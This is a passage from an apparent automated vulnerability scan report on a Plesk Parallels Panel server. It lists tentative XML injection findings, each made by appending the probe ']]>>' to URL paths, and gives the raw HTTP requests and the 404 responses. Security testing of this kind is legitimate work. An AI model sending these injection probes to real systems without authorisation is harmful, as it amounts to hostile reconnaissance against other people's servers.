The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:24:51 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /get_password.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /get_password.php]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

forgery_protection_token=c7878983c80b3cf3da41783ee040bd4b&cmd=get_password&login_name=xss&email=xss%40xss.cx&send=

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:24:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/chk.js.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/chk.js.php HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:37 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/chk.js.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/chk.js.php]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:39 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/common.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/common.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/common.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/common.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/common.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/common.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:33 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/frameset.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/frameset.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/frameset.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:27:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/frameset.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/frameset.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/frameset.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:27:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/jsw.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/jsw.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/jsw.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:37 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/jsw.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/jsw.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/jsw.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:43 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/leftframe.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/leftframe.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/leftframe.js HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/leftframe.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/leftframe.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/leftframe.js]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/main.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/main.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/main.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/main.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:19 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.leIE7.fixes.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/main.leIE7.fixes.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/main.leIE7.fixes.js HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.leIE7.fixes.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/main.leIE7.fixes.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/main.leIE7.fixes.js]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:16 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/tooltip.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/tooltip.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/tooltip.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:04 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/tooltip.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/tooltip.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/tooltip.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/widget.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/widget.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript]]>>/widget.js HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/widget.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /javascript/widget.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/widget.js]]>> HTTP/1.1
